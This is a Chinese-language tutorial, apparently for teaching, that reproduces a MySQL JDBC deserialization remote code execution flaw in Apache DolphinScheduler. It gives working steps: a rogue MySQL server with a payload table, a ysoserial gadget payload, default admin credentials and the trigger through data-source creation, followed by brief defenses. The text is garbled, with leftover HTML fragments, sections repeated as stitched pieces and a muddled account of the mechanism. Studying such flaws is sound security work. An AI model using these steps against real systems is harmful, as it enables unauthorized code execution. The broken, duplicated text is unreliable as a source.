DolphinScheduler 漏洞复现与分析教学文档<\/h1>

0x00 漏洞概述<\/h2>
本漏洞是Apache DolphinScheduler中的一个MySQL JDBC反序列化漏洞，攻击者可以通过构造恶意MySQL服务器或利用特定配置的MySQL服务器，在DolphinScheduler添加数据源时触发反序列化操作，导致远程代码执行(RCE)。<\/p>

0x01 漏洞原理<\/h2>
该漏洞利用了MySQL Connector\/J (5.1.34版本)的一个已知反序列化漏洞(CVE-2017-3523)，当`detectCustomCollations<\/code>设置为true时，ServerStatusDiffInterceptor<\/code>会尝试从MySQL服务器获取字符集信息并进行反序列化操作。<\/p>`

0x02 环境准备<\/h2>
系统要求<\/h3>

Linux系统(推荐Debian)<\/li>
JDK 8u (特定版本)<\/li>
MySQL服务器(用于搭建恶意服务器)<\/li>
<\/ul>
工具准备<\/h3>

ysoserial工具(用于生成反序列化payload)<\/li>
rewrite_example.so (MySQL插件)<\/li>
DolphinScheduler漏洞版本<\/li>
<\/ol>
0x03 漏洞复现步骤<\/h2>
1. 配置恶意MySQL服务器<\/h3>

安装MySQL插件：<\/li>
<\/ol>
cp rewrite_example.so \/usr\/lib\/mysql\/plugin\/rewrite_example.so
<\/span><\/span><\/code><\/pre>
在MySQL中执行：<\/li>
<\/ol>
INSTALL PLUGIN rewrite_example SONAME 'rewrite_example.so'<\/span>;
<\/span><\/span><\/code><\/pre>
创建恶意数据库和表结构：<\/li>
<\/ol>
CREATE<\/span> database<\/span> codeplutos;
<\/span><\/span>Use codeplutos;
<\/span><\/span>SET<\/span> NAMES<\/span> utf8mb4;
<\/span><\/span>SET<\/span> FOREIGN_KEY_CHECKS =<\/span> 0<\/span>;
<\/span><\/span>
<\/span><\/span>DROP<\/span> TABLE<\/span> IF<\/span> EXISTS<\/span> `<\/span>payload`<\/span>;
<\/span><\/span>CREATE<\/span> TABLE<\/span> `<\/span>payload`<\/span> (
<\/span><\/span>  `<\/span>COLLATION_NAME<\/span>`<\/span> varchar(255<\/span>) DEFAULT<\/span> NULL<\/span>,
<\/span><\/span>  `<\/span>CHARACTER_SET_NAME<\/span>`<\/span> blob,
<\/span><\/span>  `<\/span>ID`<\/span> int(5<\/span>) DEFAULT<\/span> NULL<\/span>,
<\/span><\/span>  `<\/span>IS_DEFAULT`<\/span> varchar(255<\/span>) DEFAULT<\/span> NULL<\/span>,
<\/span><\/span>  `<\/span>IS_COMPILED`<\/span> varchar(255<\/span>) DEFAULT<\/span> NULL<\/span>,
<\/span><\/span>  `<\/span>SORTLEN`<\/span> int(5<\/span>) DEFAULT<\/span> NULL<\/span>
<\/span><\/span>) ENGINE=<\/span>InnoDB DEFAULT<\/span> CHARSET=<\/span>utf8;
<\/span><\/span>
<\/span><\/span>INSERT<\/span> INTO<\/span> `<\/span>payload`<\/span> VALUES<\/span> ('1big5_chinese_ci'<\/span>, 0<\/span>x01, 1<\/span>, 'Yes'<\/span>, 'Yes'<\/span>, 1<\/span>);
<\/span><\/span>SET<\/span> FOREIGN_KEY_CHECKS =<\/span> 1<\/span>;
<\/span><\/span><\/code><\/pre>2. 生成反序列化payload<\/h3>

使用ysoserial生成payload：<\/li>
<\/ol>
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRE8u20 "touch \/tmp\/1.txt"<\/span> > payload.bin
<\/span><\/span><\/code><\/pre>
将payload转换为hex格式：<\/li>
<\/ol>
import<\/span> binascii
<\/span><\/span>
<\/span><\/span>with<\/span> open("payload.bin"<\/span>, 'rb'<\/span>) as<\/span> f:
<\/span><\/span>    payload_content =<\/span> str(binascii.<\/span>b2a_hex(f.<\/span>read()))
<\/span><\/span>    print(payload_content)
<\/span><\/span><\/code><\/pre>
将生成的hex payload写入MySQL：<\/li>
<\/ol>
set<\/span> @<\/span>a=<\/span>0<\/span>x[生成的<\/span>hex payload];
<\/span><\/span>update<\/span> codeplutos.payload set<\/span> character_set_name<\/span> =<\/span> @<\/span>a;
<\/span><\/span><\/code><\/pre>3. 触发漏洞<\/h3>

登录DolphinScheduler (默认凭证: admin\/dolphinscheduler123)<\/li>
导航到"数据源管理" -> "创建数据源"<\/li>
填写恶意MySQL服务器信息：

数据库类型：MySQL<\/li>
主机：恶意MySQL服务器IP<\/li>
端口：3306<\/li>
用户名\/密码：有效MySQL凭证<\/li>
<\/ul>
<\/li>
点击"Create"按钮(注意不是"Connect")<\/li>
<\/ol>
4. 验证漏洞<\/h3>
检查目标服务器上是否创建了\/tmp\/1.txt<\/code>文件：<\/p>
ls \/tmp\/1.txt
<\/span><\/span><\/code><\/pre>0x04 漏洞分析<\/h2>
漏洞触发流程<\/h3>

DolphinScheduler调用DriverManager.getConnection()<\/code>连接MySQL服务器<\/li>
MySQL Connector\/J尝试获取字符集信息<\/li>
ServerStatusDiffInterceptor<\/code>处理服务器返回的数据<\/li>
当detectCustomCollations<\/code>为true时，会反序列化CHARACTER_SET_NAME<\/code>字段<\/li>
反序列化过程中执行恶意payload<\/li>
<\/ol>
关键代码分析<\/h3>
\/\/ 漏洞触发点
<\/span><\/span><\/span><\/span>connection =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>
<\/span><\/span>    datasource.<\/span>getJdbcUrl<\/span>(),<\/span> 
<\/span><\/span>    datasource.<\/span>getUser<\/span>(),<\/span> 
<\/span><\/span>    datasource.<\/span>getPassword<\/span>()<\/span>
<\/span><\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反序列化发生在ServerStatusDiffInterceptor中
<\/span><\/span><\/span>\/\/ 当检测到自定义排序规则时，会尝试反序列化数据
<\/span><\/span><\/span><\/code><\/pre>0x05 防御措施<\/h2>

升级MySQL Connector\/J到安全版本(5.1.49+)<\/li>
在DolphinScheduler配置中禁用detectCustomCollations<\/code><\/li>
限制DolphinScheduler只能连接可信的MySQL服务器<\/li>
更新DolphinScheduler到最新版本<\/li>
<\/ol>
0x06 参考资源<\/h2>

Apache官方公告<\/a><\/li>
DolphinScheduler开发环境搭建<\/a><\/li>
MySQL JDBC反序列化分析<\/a><\/li>
BlackHat相关披露<\/a><\/li>
<\/ol>

DolphinScheduler 漏洞复现与分析教学文档<\/h1>

0x00 漏洞概述<\/h2> 本漏洞是Apache DolphinScheduler中的一个MySQL JDBC反序列化漏洞，攻击者可以通过构造恶意MySQL服务器或利用特定配置的MySQL服务器，在DolphinScheduler添加数据源时触发反序列化操作，导致远程代码执行(RCE)。<\/p>

0x01 漏洞原理<\/h2> 该漏洞利用了MySQL Connector\/J (5.1.34版本)的一个已知反序列化漏洞(CVE-2017-3523)，当detectCustomCollations<\/code>设置为true时，ServerStatusDiffInterceptor<\/code>会尝试从MySQL服务器获取字符集信息并进行反序列化操作。<\/p>

0x03 漏洞复现步骤<\/h2>

0x04 漏洞分析<\/h2>

0x06 参考资源<\/h2> Apache官方公告<\/a><\/li> DolphinScheduler开发环境搭建<\/a><\/li> MySQL JDBC反序列化分析<\/a><\/li> BlackHat相关披露<\/a><\/li> <\/ol>

0x00 漏洞概述<\/h2>
本漏洞是Apache DolphinScheduler中的一个MySQL JDBC反序列化漏洞，攻击者可以通过构造恶意MySQL服务器或利用特定配置的MySQL服务器，在DolphinScheduler添加数据源时触发反序列化操作，导致远程代码执行(RCE)。<\/p>

0x01 漏洞原理<\/h2>
该漏洞利用了MySQL Connector\/J (5.1.34版本)的一个已知反序列化漏洞(CVE-2017-3523)，当`detectCustomCollations<\/code>设置为true时，ServerStatusDiffInterceptor<\/code>会尝试从MySQL服务器获取字符集信息并进行反序列化操作。<\/p>`

0x06 参考资源<\/h2>

Apache官方公告<\/a><\/li>
DolphinScheduler开发环境搭建<\/a><\/li>
MySQL JDBC反序列化分析<\/a><\/li>
BlackHat相关披露<\/a><\/li> <\/ol>